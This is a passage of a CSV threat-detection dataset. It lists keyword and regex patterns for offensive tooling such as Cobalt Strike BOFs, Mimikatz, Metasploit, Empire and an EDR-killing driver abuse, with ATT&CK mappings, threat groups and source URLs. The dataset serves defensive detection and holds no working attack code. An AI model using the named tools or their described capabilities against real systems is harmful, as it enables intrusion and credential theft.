- T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*process_inject_execute*",".{0,1000}process_inject_execute.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - 
Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*process_inject_min_alloc*",".{0,1000}process_inject_min_alloc.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*process_inject_startrwx*",".{0,1000}process_inject_startrwx.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*Process_Inject_Struct*",".{0,1000}Process_Inject_Struct.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "*process_inject_transform_x*",".{0,1000}process_inject_transform_x.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*process_inject_userwx*",".{0,1000}process_inject_userwx.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - 
T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*process_killer.exe*",".{0,1000}process_killer\.exe.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","4","345","63","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*process_memdump.rb*",".{0,1000}process_memdump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*process_mimikatz*",".{0,1000}process_mimikatz.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*process_protection_enum *",".{0,1000}process_protection_enum\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. 
limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","0","N/A","10","10","50","8","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z" "*process_protection_enum*.dmp*",".{0,1000}process_protection_enum.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 
- T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*process_protection_enum.*",".{0,1000}process_protection_enum\..{0,1000}","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","1","N/A","10","10","50","8","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z" 
"*Process_Protection_Level_BOF.*",".{0,1000}Process_Protection_Level_BOF\..{0,1000}","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","1","N/A","10","10","50","8","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z" "*Process_Protection_Level_BOF/*",".{0,1000}Process_Protection_Level_BOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. 
limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","1","N/A","10","10","50","8","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z" "*process_snapshot.exe*",".{0,1000}process_snapshot\.exe.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","286","33","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*ProcessCommandChannelImplantMessage*",".{0,1000}ProcessCommandChannelImplantMessage.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" 
"*ProcessDestroy.x64*",".{0,1000}ProcessDestroy\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*ProcessDestroy.x64.*",".{0,1000}ProcessDestroy\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*ProcessDestroy.x86*",".{0,1000}ProcessDestroy\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*ProcessDestroy.x86.*",".{0,1000}ProcessDestroy\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*ProcessEncryptedC2Request*",".{0,1000}ProcessEncryptedC2Request.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*ProcessFileZillaFile*",".{0,1000}ProcessFileZillaFile.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ProcessHerpaderping_x64*",".{0,1000}ProcessHerpaderping_x64.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ProcessHerpaderping_x86*",".{0,1000}ProcessHerpaderping_x86.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - 